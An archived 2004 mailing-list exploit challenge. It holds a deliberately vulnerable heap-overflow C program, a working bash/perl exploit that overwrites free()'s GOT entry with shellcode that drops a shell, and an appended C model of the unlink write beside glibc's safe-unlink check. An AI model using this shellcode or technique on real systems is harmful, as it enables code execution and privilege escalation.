Vulnerability Development mailing list archives
challenge
From: "fuzzy () bonbon net" <fuzzy () bonbon net>
Date: Sat, 11 Sep 2004 08:43:29 -0400
//----=[ Challenge ]=----//

Having been with the vulndev mailing list for a while now without seeing an exploit challenge, I thought I would offer one up for the masses... However, this vulnerability is simple in design yet appears to be difficult to exploit in C... I have supplied a working bash script for the vuln, but it relies upon the perl interpreter to supply the payload... The challenge is to create a working exploit in C, not perl or bash.

/* vuln.c */
/* familiar? ... */
#include <stdio.h>
#include <stdlib.h>

#define LEN 256

int main(void)
{
    char *buf1 = (char *)malloc(LEN);
    char *buf2 = (char *)malloc(LEN);

    printf("buf1: %p\n", buf1);
    printf("buf2: %p\n", buf2);

    gets(buf1);     /* unbounded read: runs past buf1 into buf2's chunk header */
    free(buf2);     /* freed first, with whatever header the overflow left */
    free(buf1);
    return 0;
}

Notice the gets() function and the ordering of the free()'s..

The bash script using perl is as follows...

#!/bin/sh
# Thanks je
# No error checking
shellcode=`
printf "\xeb\x10AAAABBBBCCCCDDDD"
printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
`
prog=./vuln
# GOT entry of free(), read from the binary's dynamic relocations
dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'`
# where the shellcode environment variable lands near the top of the stack
code_addr=`perl -e 'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'`
echo "Shell dropped"
# 256 bytes of filler, then buf2's fake chunk header: prev_size, size, fd, bk
(perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) . pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| \
env - shellcode=$shellcode \
./vuln
exit 0

Hopefully I shall get responses to this challenge,...

Regards...

//-----=[ EOF ]=-----//
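As an added illustration, not part of the post, here is a C model of the two writes the allocator's unlink() performs on the fake chunk header the payload builds, beside the pointer-integrity check that later glibc versions added to refuse exactly this header. sim_got, sim_code, craft_fake_chunk and the demo functions are stand-ins for the real GOT slot and code address, using native pointer width rather than the post's 32-bit layout.

```c
#include <stddef.h>
/* dlmalloc-style free-chunk header (native pointer width: fd/bk sit at 16/24
 * on a 64-bit build instead of the 8/12 of the post's 32-bit target). */
struct chunk { size_t prev_size; size_t size; struct chunk *fd; struct chunk *bk; };
/* The exploit picks fd = &GOT[free] - 12 so that fd->bk overlaps the GOT slot;
 * modelling the GOT as a chunk whose bk field is that slot gives the same overlap. */
static struct chunk sim_got;   /* sim_got.bk  plays GOT[free]                */
static struct chunk sim_code;  /* sim_code.fd plays the bytes at code_addr+8 */

/* The original, unchecked unlink(): two writes whose targets come from the chunk. */
static void unlink_unchecked(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
}
/* Safe unlinking, as later glibc versions added: neighbours must point back at p. */
static int unlink_checked(struct chunk *p) {
    struct chunk *fd = p->fd, *bk = p->bk;
    if (fd->bk != p || bk->fd != p)
        return -1;             /* glibc aborts here: "corrupted double-linked list" */
    fd->bk = bk;
    bk->fd = fd;
    return 0;
}

/* The header the challenge payload writes over buf2's chunk. */
static void craft_fake_chunk(struct chunk *fake) {
    fake->prev_size = 0;       /* backward consolidation resolves to the chunk itself */
    fake->size = 256 + 8;      /* PREV_INUSE clear, so free() tries to consolidate */
    fake->fd = &sim_got;       /* dest_addr - 12 in the post */
    fake->bk = &sim_code;      /* code_addr in the post */
}

/* 1 if the unchecked unlink redirected GOT[free] to the code region and also
 * clobbered the bytes after code_addr (why the shellcode opens with a jmp). */
int demo_unchecked(void) {
    struct chunk fake;
    sim_got.bk = NULL; sim_code.fd = NULL;
    craft_fake_chunk(&fake);
    unlink_unchecked(&fake);
    return sim_got.bk == &sim_code && sim_code.fd == &sim_got;
}

/* 1 if safe unlinking rejects the same fake chunk and leaves GOT[free] untouched. */
int demo_checked(void) {
    struct chunk fake;
    sim_got.bk = NULL; sim_code.fd = NULL;
    craft_fake_chunk(&fake);
    return unlink_checked(&fake) == -1 && sim_got.bk == NULL;
}
```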